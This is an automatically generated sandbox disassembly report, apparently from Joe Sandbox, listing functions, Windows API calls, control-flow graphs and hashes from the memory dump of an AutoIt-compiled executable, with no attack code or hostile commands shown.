                                                                                Function 00007FF79F8825BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 557 7ff79f8825bc-7ff79f88263d 561 7ff79f88287e-7ff79f8828af 557->561 562 7ff79f882643-7ff79f88267c 557->562 564 7ff79f882680-7ff79f882687 562->564 565 7ff79f88268d-7ff79f8826a1 564->565 566 7ff79f882856-7ff79f882876 564->566 568 7ff79f8826a7-7ff79f8826bc 565->568 569 7ff79f8cd148-7ff79f8cd14f 565->569 566->561 572 7ff79f8829c8-7ff79f8829eb PeekMessageW 568->572 573 7ff79f8826c2-7ff79f8826c9 568->573 570 7ff79f8cd155 569->570 571 7ff79f882702-7ff79f882723 569->571 579 7ff79f8cd15a-7ff79f8cd160 570->579 585 7ff79f88276e-7ff79f8827d2 571->585 586 7ff79f882725-7ff79f88272c 571->586 575 7ff79f8826e8-7ff79f8826ef 572->575 576 7ff79f8829f1-7ff79f8829f5 572->576 573->572 577 7ff79f8826cf-7ff79f8826d4 573->577 583 7ff79f8ce285-7ff79f8ce293 575->583 584 7ff79f8826f5-7ff79f8826fc 575->584 580 7ff79f8829fb-7ff79f882a05 576->580 581 7ff79f8cd1aa-7ff79f8cd1bb 576->581 577->572 582 7ff79f8826da-7ff79f8826e2 GetInputState 577->582 587 7ff79f8cd162-7ff79f8cd176 579->587 588 7ff79f8cd19b 579->588 580->579 589 7ff79f882a0b-7ff79f882a1d call 7ff79f892de8 580->589 581->575 582->572 582->575 590 7ff79f8ce29d-7ff79f8ce2b5 call 7ff79f88f1c4 583->590 584->571 584->590 628 7ff79f8ce276 585->628 629 7ff79f8827d8-7ff79f8827da 585->629 586->585 591 7ff79f88272e-7ff79f882738 586->591 587->588 593 7ff79f8cd178-7ff79f8cd17f 587->593 588->581 605 7ff79f882a33-7ff79f882a4f PeekMessageW 589->605 606 7ff79f882a1f-7ff79f882a2d TranslateMessage DispatchMessageW 589->606 590->566 596 7ff79f88273f-7ff79f882742 591->596 593->588 597 7ff79f8cd181-7ff79f8cd190 TranslateAcceleratorW 593->597 601 7ff79f882748 596->601 602 7ff79f8828b0-7ff79f8828b7 596->602 597->589 603 7ff79f8cd196 597->603 608 7ff79f88274f-7ff79f882752 601->608 610 7ff79f8828eb-7ff79f8828ef 602->610 611 7ff79f8828b9-7ff79f8828cc timeGetTime 602->611 603->605 605->575 607 7ff79f882a55 605->607 606->605 607->576 614 7ff79f882758-7ff79f882761 608->614 615 7ff79f8828f4-7ff79f8828fb 608->615 610->596 612 7ff79f8cd2ab-7ff79f8cd2b0 611->612 613 7ff79f8828d2-7ff79f8828d7 611->613 617 7ff79f8828dc-7ff79f8828e5 612->617 618 7ff79f8cd2b6 612->618 613->617 619 7ff79f8828d9 613->619 622 7ff79f882767 614->622 623 7ff79f8cd4c7-7ff79f8cd4ce 614->623 620 7ff79f8cd2f8-7ff79f8cd303 615->620 621 7ff79f882901-7ff79f882905 615->621 617->610 625 7ff79f8cd2bb-7ff79f8cd2f3 timeGetTime call 7ff79f892ac0 call 7ff79f8f3a28 617->625 618->625 619->617 626 7ff79f8cd305 620->626 627 7ff79f8cd309-7ff79f8cd30c 620->627 621->608 622->585 625->610 626->627 631 7ff79f8cd312-7ff79f8cd319 627->631 632 7ff79f8cd30e 627->632 628->583 629->628 633 7ff79f8827e0-7ff79f8827ee 629->633 636 7ff79f8cd322-7ff79f8cd329 631->636 637 7ff79f8cd31b 631->637 632->631 633->628 634 7ff79f8827f4-7ff79f882819 633->634 638 7ff79f88290a-7ff79f88290d 634->638 639 7ff79f88281f-7ff79f882829 call 7ff79f882b70 634->639 641 7ff79f8cd332-7ff79f8cd33d call 7ff79f8942a0 636->641 642 7ff79f8cd32b 636->642 637->636 645 7ff79f882931-7ff79f882933 638->645 646 7ff79f88290f-7ff79f88291a call 7ff79f882e30 638->646 649 7ff79f88282e-7ff79f882836 639->649 641->601 641->623 642->641 651 7ff79f882935-7ff79f882949 call 7ff79f8866c0 645->651 652 7ff79f882971-7ff79f882974 645->652 646->649 655 7ff79f88299e-7ff79f8829ab 649->655 656 7ff79f88283c 649->656 665 7ff79f88294e-7ff79f882950 651->665 653 7ff79f88297a-7ff79f882997 call 7ff79f8801a0 652->653 654 7ff79f8cdfbe-7ff79f8cdfc0 652->654 666 7ff79f88299c 653->666 660 7ff79f8cdfc2-7ff79f8cdfc5 654->660 661 7ff79f8cdfed-7ff79f8cdff6 654->661 662 7ff79f8ce181-7ff79f8ce197 call 7ff79f894c24 * 2 655->662 663 7ff79f8829b1-7ff79f8829be call 7ff79f894c24 655->663 664 7ff79f882840-7ff79f882843 656->664 660->664 668 7ff79f8cdfcb-7ff79f8cdfe7 call 7ff79f883c20 660->668 672 7ff79f8ce005-7ff79f8ce00c 661->672 673 7ff79f8cdff8-7ff79f8ce003 661->673 662->628 663->572 670 7ff79f882849-7ff79f882850 664->670 671 7ff79f882b17-7ff79f882b1d 664->671 665->649 674 7ff79f882956-7ff79f882966 665->674 666->665 668->661 670->564 670->566 671->670 675 7ff79f882b23-7ff79f882b2d 671->675 679 7ff79f8ce00f-7ff79f8ce016 call 7ff79f908b98 672->679 673->679 674->649 680 7ff79f88296c 674->680 675->569 688 7ff79f8ce01c-7ff79f8ce036 call 7ff79f8f34e4 679->688 689 7ff79f8ce0d7-7ff79f8ce0d9 679->689 681 7ff79f8ce0f4-7ff79f8ce10e call 7ff79f8f34e4 680->681 694 7ff79f8ce110-7ff79f8ce11d 681->694 695 7ff79f8ce147-7ff79f8ce14e 681->695 703 7ff79f8ce06f-7ff79f8ce076 688->703 704 7ff79f8ce038-7ff79f8ce045 688->704 691 7ff79f8ce0df-7ff79f8ce0ee call 7ff79f90a320 689->691 692 7ff79f8ce0db 689->692 691->681 692->691 699 7ff79f8ce135-7ff79f8ce142 call 7ff79f894c24 694->699 700 7ff79f8ce11f-7ff79f8ce130 call 7ff79f894c24 * 2 694->700 695->670 696 7ff79f8ce154-7ff79f8ce15a 695->696 696->670 701 7ff79f8ce160-7ff79f8ce169 696->701 699->695 700->699 701->662 703->670 710 7ff79f8ce07c-7ff79f8ce082 703->710 707 7ff79f8ce05d-7ff79f8ce06a call 7ff79f894c24 704->707 708 7ff79f8ce047-7ff79f8ce058 call 7ff79f894c24 * 2 704->708 707->703 708->707 710->670 715 7ff79f8ce088-7ff79f8ce091 710->715 715->689
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                • String ID:
                                                                                • API String ID: 3249950245-0
                                                                                • Opcode ID: 3a286bfa12772c63719834a724bea86a086cad30a8da92a7678ebbb259785280
                                                                                • Instruction ID: 3edf118b7d65911dd806659b17d4b256a591c78467be3b2dac4f919279a2b631
                                                                                • Opcode Fuzzy Hash: 3a286bfa12772c63719834a724bea86a086cad30a8da92a7678ebbb259785280
                                                                                • Instruction Fuzzy Hash: B0227D32A0C6C286EBB4AF30D884BF9A7A0FB45B54F944136DA5D42699CF3CE465D720
                                                                                Function 00007FF79F873CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 849 7ff79f873cbc-7ff79f873d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Create$Show
                                                                                • String ID: AutoIt v3$d$edit
                                                                                • API String ID: 2813641753-2600919596
                                                                                • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                • Instruction ID: 1c8f452fc596109d27a9d89cb99f6a6be3a1499268edc24fe003ddc1853e1448
                                                                                • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                • Instruction Fuzzy Hash: D4215472918F8186E720DF20F8887A9B7A0F7887A9F514135D54D86668CFBDD045CB10
                                                                                Function 00007FF79F895244 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                • String ID:
                                                                                • API String ID: 2117695475-0
                                                                                • Opcode ID: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
                                                                                • Instruction ID: 9bde70ae9224c3765dc21e0c8923cbf24ac5530eeb0841dc8d4479239a9b482f
                                                                                • Opcode Fuzzy Hash: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
                                                                                • Instruction Fuzzy Hash: B811AF00E091C785FAF473F05866AF892C08F85311FD44438E81D6A6C3DE1CB4F56236
                                                                                Function 00007FF79F877EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892D8E
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892D9C
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892DAC
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892DBC
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892DCA
                                                                                  • Part of subcall function 00007FF79F892D5C: MapVirtualKeyW.USER32(?,?,?,00007FF79F877FA5), ref: 00007FF79F892DD8
                                                                                  • Part of subcall function 00007FF79F88EEC8: RegisterWindowMessageW.USER32 ref: 00007FF79F88EF76
                                                                                • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F87106D), ref: 00007FF79F878209
                                                                                • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F87106D), ref: 00007FF79F87828F
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F87106D), ref: 00007FF79F8BD36A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID: AutoIt
                                                                                • API String ID: 1986988660-2515660138
                                                                                • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                • Instruction ID: 07aa7d2e6911b7bb776085d51a44018269865b831e1f74d9cc8da74dfd416bd4
                                                                                • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                • Instruction Fuzzy Hash: 9FC1AF71D19FC285E660EB34AD814F8B7A8BF94360F90023AD45D8267DEFBDA151C7A0
                                                                                Function 00007FF79F8772C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                • String ID: Line:
                                                                                • API String ID: 3135491444-1585850449
                                                                                • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                • Instruction ID: a8528c3331549634c5997f3c5827bf99e14f3edec94bd80fda234af32cd9db2f
                                                                                • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                • Instruction Fuzzy Hash: 29414162A08AC296EB70FB30D4806FDA361FB95388FC45032D65C466AEDF7CE594D760
                                                                                Function 00007FF79F873F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetOpenFileNameW.COMDLG32 ref: 00007FF79F8BBAA2
                                                                                  • Part of subcall function 00007FF79F8756D4: GetFullPathNameW.KERNEL32(?,00007FF79F8756C1,?,00007FF79F877A0C,?,?,?,00007FF79F87109E), ref: 00007FF79F8756FF
                                                                                  • Part of subcall function 00007FF79F873EB4: GetLongPathNameW.KERNELBASE ref: 00007FF79F873ED8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                • API String ID: 779396738-2360590182
                                                                                • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                • Instruction ID: 73bb95e6a4f64efdd632c2b72461554b702299c2c7fac3cc803fcbf318f422db
                                                                                • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                • Instruction Fuzzy Hash: C2316C62608BC289E760EB21E8406EDB7A4FB49BC4F984135DE8C47B59DF3CD595CB10
                                                                                Function 00007FF79F894610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3812282468-0
                                                                                • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                • Instruction ID: 40dc59b93a7595957cbfb081e504773b0466485e15babc5e32827b460624af3b
                                                                                • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                • Instruction Fuzzy Hash: 0E31C162A0C7C297EBB69B3191406F9B798EB44FD4FA84032DE4D0B74ACE2CD655C760
                                                                                Function 00007FF79F876F60 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF79F876F52,?,?,?,?,?,?,00007FF79F87782C), ref: 00007FF79F876FA5
                                                                                • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF79F876F52,?,?,?,?,?,?,00007FF79F87782C), ref: 00007FF79F876FD3
                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF79F876F52,?,?,?,?,?,?,00007FF79F87782C), ref: 00007FF79F876FFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                • Instruction ID: 0522147ae5007a8c3a3279f286d25a57d32f1ae6802e6975d49318e6b4330765
                                                                                • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                • Instruction Fuzzy Hash: 27219F33A1878187D7609F25E440AAEB3E4FB48B94B841131DB9DC3B14DF39E494DB14
                                                                                Function 00007FF79F899118 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                • Instruction ID: 47ae3ddbe90b32e71ae552be4dd99187a83d46dcf727508d4beebaf87c8ebee0
                                                                                • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                • Instruction Fuzzy Hash: 45E04F20F0478182EFA47B709C897F9A356BF88B51F815438C80E4739ACE3DF4989321
                                                                                Function 00007FF79F8866C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: CALL
                                                                                • API String ID: 1385522511-4196123274
                                                                                • Opcode ID: 278cfb30bd3ca7767d208b8ebc54255a4a2aa9310e72bb4b170a940d14afb9b0
                                                                                • Instruction ID: 6866c40fdffd5682d8c41c3d3fa60f2814e6960fd44ea47a24f4b623aa410b23
                                                                                • Opcode Fuzzy Hash: 278cfb30bd3ca7767d208b8ebc54255a4a2aa9310e72bb4b170a940d14afb9b0
                                                                                • Instruction Fuzzy Hash: A0228F72B086818AEB60EF74D440AECB7A1FB44B98F904136CA5D57795CF38E865D360
                                                                                Function 00007FF79F876838 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                • Instruction ID: 61200af2ef4c1ed7c5f13a06fee224751d0434bf73c60a1abcbe01a45e6d553d
                                                                                • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                • Instruction Fuzzy Hash: 2A41A0B2E0868282E7B0AF30E415BB9F7A0EB457A8F844230DA6D477D9CF3DD454A750
                                                                                Function 00007FF79F876460 Relevance: 3.1, APIs: 2, Instructions: 91libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                • String ID:
                                                                                • API String ID: 2632591731-0
                                                                                • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                • Instruction ID: 6569f4006a8bcc47dde390f61dd66654aa21ce89d7e78c6d77b093e46b039ead
                                                                                • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                • Instruction Fuzzy Hash: F2419262B14A9286EB60EF35D8517FC63A0EB4478CF854131EA0D87789DF3CD868D720
                                                                                Function 00007FF79F876258 Relevance: 3.1, APIs: 2, Instructions: 72windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
